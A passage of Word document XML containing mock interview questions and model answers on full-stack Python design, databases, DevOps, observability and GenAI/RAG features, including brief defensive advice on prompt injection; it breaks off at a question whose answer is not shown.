        <w:t>Q2. How would you design authentication, authorization, and session management for a full-stack Python application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Backend/API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a standard identity flow such as OAuth2/OIDC or secure username/password with hashed passwords and MFA where needed. Store sessions in secure HttpOnly cookies or use short-lived JWTs with refresh-token rotation. Authorization should be enforced server-side with roles, scopes, or policy checks per resource, not only hidden frontend buttons. Add CSRF protection for cookie-based auth, rate limiting on login, audit logs for sensitive actions, and secret storage outside code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design models, migrations, indexes, and API contracts for a Python backend connected to PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Backend/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from domain entities and access patterns, then design tables with primary keys, foreign keys, unique constraints, and useful indexes. Use SQLAlchemy/Alembic or Django ORM/migrations so schema changes are versioned and reviewed. Keep API request/response schemas explicit with Pydantic, serializers, or OpenAPI. Watch for N+1 queries, missing indexes, unsafe migrations, and backward compatibility between API and database changes during deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would the frontend handle API errors, loading states, pagination, authentication tokens, and form validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Frontend/Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a consistent API client layer that attaches auth safely, handles 401/403/429/5xx responses, and maps backend validation errors to user-friendly form messages. Show loading, empty, error, and success states intentionally. Use cursor or page-based pagination depending on backend contract, debounce search/filter requests, and avoid storing sensitive tokens in localStorage when safer cookie-based approaches are available. Frontend validation improves UX, but backend validation remains authoritative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Which DSA patterns are most important for a Python full-stack engineer, and how would you practice them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prioritize arrays/strings, hash maps, two pointers, sliding window, stacks, queues/deque, binary search, trees, graphs, heaps, recursion, and basic dynamic programming. Practice by solving pattern-based problems in Python, writing complexity analysis, and explaining tradeoffs out loud. For full-stack roles, DSA matters less than competitive programming depth but still proves problem solving, clean coding, and ability to reason about performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you solve a coding problem during a Python interview while explaining complexity and tradeoffs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Clarify inputs, outputs, constraints, and edge cases first. Explain a brute-force approach and complexity, then look for a better pattern such as hashing, two pointers, sliding window, binary search, heap, graph traversal, or DP. Code a clear Python solution with meaningful names, test it on normal and edge cases, then summarize time and space complexity. If there are tradeoffs, explain readability versus performance and when each version is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you Dockerize a full-stack Python application with separate frontend, backend, database, and worker services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps/Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate Dockerfiles for frontend and backend, with small production images, pinned dependencies, non-root users, and health checks. Use docker-compose for local development with services for frontend, backend, PostgreSQL, Redis, and workers. Backend and worker can share the same image but run different commands. Keep secrets in environment variables or secret stores, mount code only in development, and use migrations as an explicit release step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you design a CI/CD pipeline for a full-stack Python application from pull request to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps/CI-CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: On pull request, run formatting, linting, unit tests, frontend tests, backend tests, type checks, dependency scanning, and Docker builds. On merge, build immutable images, scan them, push to a registry, run integration tests against a test environment, and deploy to staging. Production should use approvals, database migration checks, smoke tests, progressive rollout, deployment markers, and rollback. The same artifact should be promoted across environments rather than rebuilt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you deploy a Python backend, frontend, background worker, and database dependencies on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deploy the backend as a Deployment and Service with readiness/liveness probes, resource requests, HPA, ConfigMaps, and Secrets. Deploy workers separately so they scale based on queue depth. Serve frontend as static assets via CDN/object storage or as a container behind ingress. Use managed PostgreSQL where possible, Redis/Memorystore for cache/queue support, and Kubernetes Jobs for migrations. Add ingress/TLS, network policies, service accounts, observability, and rollout strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What monitoring, logging, tracing, alerts, and runbooks would you add for a production full-stack app?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/SRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor request rate, errors, latency, saturation, frontend errors, API dependencies, database latency, queue depth, worker failures, cache hit rate, and business KPIs. Add structured logs with request IDs and user/tenant context where safe, OpenTelemetry traces from frontend/API/DB/external calls, and dashboards for service health and releases. Alerts should focus on user impact and SLO burn, with runbooks that explain diagnosis, mitigation, rollback, and escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you add a GenAI chat feature to a full-stack Python application using RAG?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a backend endpoint that receives the user question, retrieves relevant documents from a vector database, constructs a prompt with context and guardrails, calls the LLM, and returns an answer with citations. Add an ingestion pipeline for documents: parse, chunk, embed, store vectors, and track metadata. The frontend should show streaming responses, sources, loading/error states, and feedback buttons. Add auth, tenant isolation, rate limits, logging, evaluation, and cost controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you design prompt templates, embeddings, vector search, citations, and response streaming in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Backend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Version prompt templates like code and keep system instructions, retrieved context, and user input clearly separated. Generate embeddings during ingestion and query time using the same model family, store vectors with metadata, and retrieve top-k chunks using similarity plus filters. Include source IDs in context so the answer can cite documents. For UX, stream tokens from the backend to the frontend using SSE or WebSockets while preserving trace IDs and safety checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you protect a GenAI feature from prompt injection, data leakage, hallucinations, and unsafe tool calls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Safety</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat user input and retrieved documents as untrusted. Keep system instructions separate, restrict what context is retrieved by tenant and permission, redact secrets/PII, and validate tool calls against an allowlist with least privilege. Require citations for knowledge-grounded answers, use output validation for structured responses, add refusal behavior for unsafe requests, and log enough metadata to investigate issues without storing sensitive prompts unnecessarily.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you monitor GenAI quality, latency, token cost, retrieval quality, and user feedback in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Track latency by stage: retrieval, reranking, LLM call, and streaming. Log token counts, model version, prompt version, retrieved document IDs, cache hit rate, errors, and cost per feature. Measure retrieval quality with offline evaluation sets and production feedback such as thumbs up/down, citation clicks, and escalation rates. Add alerts for cost spikes, latency regressions, model errors, empty retrieval, and quality regression after prompt or model changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Design a full-stack AI resume analyzer using Python, React, PostgreSQL, object storage, queues, and an LLM API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use React for upload, progress, results, and feedback. The Python API creates an upload record, returns a signed URL for object storage, and enqueues parsing/analysis after upload. Workers extract text, store structured resume data in PostgreSQL, call embeddings or LLM APIs for scoring and suggestions, and write results back with status updates. Add authentication, per-user access control, file scanning, PII protection, rate limits, retries, observability, and a clear audit trail for generated recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What 90-day learning plan would make someone interview-ready for full-stack Python, DSA, DevOps, and GenAI roles?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Career/Interview Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Days 1-30: Python fundamentals, FastAPI/Django, SQL/PostgreSQL, REST APIs, Git, testing, and core DSA patterns. Days 31-60: build and deploy a full-stack app with React, Docker, CI/CD, Redis, queues, observability, and Kubernetes or Cloud Run. Days 61-90: add GenAI/RAG features, vector search, prompt evaluation, security guardrails, and production monitoring. Throughout, practice DSA daily, write project READMEs, prepare system-design stories, and rehearse explaining tradeoffs clearly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 56 - Scenario-Based System Design for Full Stack Python and GenAI Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Scenario: Your Python API suddenly receives 10x traffic after a product launch. How would you redesign the system for scale and reliability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First stabilize: check error rate, latency, CPU/memory, DB pool saturation, queue depth, and autoscaling. Add horizontal replicas, tune Gunicorn/Uvicorn workers, increase database pool carefully, and enable caching for hot reads. Then redesign for sustained load: stateless API behind a load balancer, Redis cache, async workers for slow tasks, rate limits, backpressure, read replicas if needed, autoscaling based on real metrics, and SLO-based alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Scenario: A PostgreSQL-backed Python application has slow searches and frequent lock waits. How would you investigate and redesign it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inspect slow query logs, pg_stat_activity, pg_stat_statements, explain plans, lock waits, missing indexes, N+1 ORM queries, and transaction duration. Short term, add or fix indexes, reduce transaction scope, paginate queries, and kill/avoid runaway queries. Long term, redesign search with proper full-text indexes or a search engine, separate read/write paths, use background jobs for heavy updates, and make migrations safer with online patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Scenario: A dashboard endpoint is slow because it recalculates expensive reports on every request. How would you design caching and background refresh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Caching</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Move expensive calculation out of the request path. Use a scheduled worker or event-driven job to precompute report snapshots, store them in PostgreSQL or Redis, and serve the dashboard from cached data. Add TTLs, versioned cache keys, invalidation on relevant data changes, and a stale-while-revalidate pattern if freshness can be slightly delayed. Monitor cache hit rate, refresh failures, data age, and report generation latency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Scenario: Users upload large files and the API times out while processing them. How would you redesign the upload and processing flow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Queues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use signed URLs so users upload directly to object storage instead of sending large files through the API. The API creates metadata and returns an upload target, then a storage event or explicit finalize call enqueues processing. Workers validate, scan, parse, transform, and update status asynchronously. The frontend polls or subscribes for status. Add file size/type limits, retries, dead-letter queues, virus scanning, encryption, and per-user access checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Scenario: A full-stack Python app has manual deployments and frequent production regressions. How would you design the CI/CD and release process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a pipeline that runs linting, formatting, unit tests, integration tests, frontend tests, security scans, image builds, and migration checks on pull requests. On merge, build immutable artifacts, deploy to staging, run smoke tests, then promote the same artifacts to production with approval and progressive rollout. Add feature flags, rollback, deployment markers, database migration safety, release notes, and production monitoring gates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Scenario: Your Kubernetes deployment has intermittent 502 errors during rolling updates. How would you debug and fix the rollout design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check ingress/load balancer backend health, pod readiness, termination logs, preStop hooks, graceful shutdown, readiness probe behavior, and whether traffic reaches pods before they are ready or after shutdown starts. Fix with correct readiness probes, startup probes for slow apps, preStop delay, terminationGracePeriodSeconds, connection draining, maxUnavailable 0 or low, sufficient replicas, PodDisruptionBudget, and backward-compatible releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Scenario: Customers report errors, but logs are hard to correlate across frontend, backend, workers, and database calls. How would you redesign observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Introduce a correlation/request ID generated at the edge or frontend and propagate it through API calls, worker jobs, logs, traces, and downstream requests. Use structured JSON logs with service, env, version, user or tenant context where safe, and error codes. Add OpenTelemetry tracing across frontend/backend/DB/external calls, metrics for golden signals, dashboards by user journey, and alert runbooks that link to traces and logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Scenario: A multi-tenant SaaS app accidentally exposes one customer's data to another customer. How would you respond and redesign tenant isolation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First contain the incident: disable the affected path, preserve logs, identify impacted tenants/data, notify stakeholders, and rotate credentials if needed. Redesign by enforcing tenant_id at the data model and query layer, adding authorization checks server-side, using row-level security where appropriate, and preventing tenant IDs from being trusted from the client. Add tests for cross-tenant access, audit logs, scoped caches, and security review for every data access pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Scenario: The frontend feels slow even though backend latency looks healthy. How would you investigate and improve end-user performance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Measure real user metrics: LCP, INP, CLS, JS bundle size, API waterfall, browser errors, CDN/cache behavior, and client rendering time. Backend latency may be fine while frontend is blocked by large bundles, sequential API calls, slow hydration, inefficient rendering, or poor caching. Improve with code splitting, CDN caching, image optimization, fewer round trips, optimistic UI where safe, pagination/virtualization, and frontend monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Scenario: A GenAI chat feature gives outdated or irrelevant answers from your knowledge base. How would you debug and redesign the RAG pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/GenAI RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break the pipeline into ingestion, chunking, embedding, indexing, retrieval, reranking, prompt construction, and generation. Check whether source documents are fresh, chunks are too large/small, embeddings match the query domain, metadata filters are correct, and top-k results are relevant. Add retrieval evaluation sets, citations, recency metadata, document reindexing, hybrid search if needed, reranking, and feedback loops for bad answers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Scenario: A user tries prompt injection to make your AI assistant reveal internal documents. How would you prevent and monitor this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
